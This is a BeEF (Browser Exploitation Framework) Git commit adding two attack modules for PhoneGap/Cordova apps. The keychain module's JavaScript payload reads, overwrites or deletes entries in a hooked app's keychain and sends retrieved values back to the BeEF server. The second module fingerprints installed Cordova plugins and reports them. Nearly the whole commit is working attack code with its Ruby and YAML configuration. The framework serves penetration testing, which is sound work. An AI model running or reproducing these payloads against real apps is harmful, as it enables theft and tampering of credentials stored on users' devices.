Merge pull request #894 from sgorbaty/master

New functionality - detect phonegap plugins
2013-05-09 01:59:49 -07:00
parent 8d60c10298 498372aef3
commit 8ecdceb928
6 changed files with 232 additions and 0 deletions
--- a/modules/phonegap/phonegap_keychain/command.js
+++ b/modules/phonegap/phonegap_keychain/command.js
@@ -0,0 +1,82 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_keychain
+//
+beef.execute(function() {
+    var servicename = "<%== @servicename %>";
+    var key = "<%== @key %>";
+    var value = "<%== @value %>";
+    var action = "<%== @action %>";
+    var result = '';
+    var kc = '';
+
+    try {
+        kc = cordova.require("cordova/plugin/keychain");
+    } catch (err) {
+        result = 'Unable to access keychain plugin';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    }
+
+    function onGet()
+    {  
+        var win = function(value) {
+            result = result + "GET SUCCESS - Key: " + key + " Value: " + value;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+
+        };
+        var fail = function(error) {
+            result = result + "GET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.getForKey(win, fail, key, servicename);
+
+    }
+    
+    function onSet()
+    {        
+        var win = function() {
+            result = result + "SET SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "SET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.setForKey(win, fail, key, servicename, value);
+    }
+    
+    function onRemove()
+    {
+        var win = function() {
+            result = result + "REMOVE SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "REMOVE FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.removeForKey(win, fail, key, servicename);
+    }
+
+    if (kc !== undefined)  {
+        switch(action) {
+            case 'Read':
+                onGet();
+                break;
+            case 'CreateUpdate':
+                onSet();
+                break;
+            case 'Delete':
+                onRemove();
+                break;
+        }
+    } 
+
+});
--- a/modules/phonegap/phonegap_keychain/config.yaml
+++ b/modules/phonegap/phonegap_keychain/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_keychain
+#
+beef:
+    module:
+        phonegap_keychain:
+            enable: true
+            category: "Phonegap"
+            name: "Keychain"
+            description: "Read/CreateUpdate/Delete Keychain Elements"
+            authors: ["staregate"]
+            target:
+                working: ["All"]
--- a/modules/phonegap/phonegap_keychain/module.rb
+++ b/modules/phonegap/phonegap_keychain/module.rb
@@ -0,0 +1,53 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_keychain
+#
+
+class Phonegap_keychain < BeEF::Core::Command
+  
+    def self.options
+        return [{
+            'name' => 'servicename', 
+            'description' => 'Service name', 
+            'ui_label'=>'Service name', 
+            'value' => 'ServiceNameTest',
+            'width' => '300px'
+            
+            },{
+            'name' => 'key', 
+            'description' => 'Key', 
+            'ui_label'=>'Key', 
+            'value' => 'TestKey',
+            'width' => '300px'
+            },{
+            'name' => 'value', 
+            'description' => 'Value', 
+            'ui_label'=>'Value', 
+            'value' => 'TestValue',
+            'width' => '100px'
+            },{
+            'name' => 'action', 
+            'type' => 'combobox',
+            'ui_label' => 'Action Type',
+            'store_type' => 'arraystore', 
+            'store_fields' => ['action'], 
+            'store_data' => [['Read'],['CreateUpdate'],['Delete']], 
+            'valueField' => 'action', 
+            'value' => 'CreateUpdate', 
+            editable: false, 
+            'displayField' => 'action', 
+            'mode' => 'local', 
+            'autoWidth' => true 
+          }]
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+
+end
--- a/modules/phonegap/phonegap_plugin_detection/command.js
+++ b/modules/phonegap/phonegap_plugin_detection/command.js
@@ -0,0 +1,49 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_plugin_detection
+//
+beef.execute(function() {
+    var result = '';
+
+    // Approximate list of plugins, intended to work with Cordova 2.x
+    var plugins = new Array(
+        "cordova/plugin/device",
+        "cordova/plugin/logger",
+        "cordova/plugin/compass",
+        "cordova/plugin/accelerometer",
+        "cordova/plugin/Camera",
+        "cordova/plugin/network",
+        "cordova/plugin/contacts",
+        "cordova/plugin/echo",
+        "cordova/plugin/File",
+        "cordova/plugin/FileTransfer",
+        "cordova/plugin/geolocation",
+        "cordova/plugin/notification",
+        "cordova/plugin/Media",
+        "cordova/plugin/capture",
+        "cordova/plugin/splashscreen",
+        "cordova/plugin/battery",
+        "cordova/plugin/globalization",
+        "cordova/plugin/InAppBrowser",
+        "cordova/plugin/keychain"
+    );
+
+    for (var i=0; i<plugins.length; i++) {
+        try {
+            var a = cordova.require(plugins[i]);
+            if (a !== undefined) {
+                result = result + '\n plugin: ' + plugins[i];
+            }
+        } catch (err) {
+            // do nothing
+        }
+    }
+
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+   
+});
--- a/modules/phonegap/phonegap_plugin_detection/config.yaml
+++ b/modules/phonegap/phonegap_plugin_detection/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   phonegap_plugin_detection
+#
+beef:
+    module:
+        phonegap_plugin_detection:
+            enable: true
+            category: "Phonegap"
+            name: "List Plugins"
+            description: "Attempts to guess installed plugins."
+            authors: ["staregate"]
+            target:
+                working: ["All"]
--- a/modules/phonegap/phonegap_plugin_detection/module.rb
+++ b/modules/phonegap/phonegap_plugin_detection/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_plugin_detection
+
+class Phonegap_plugin_detection < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end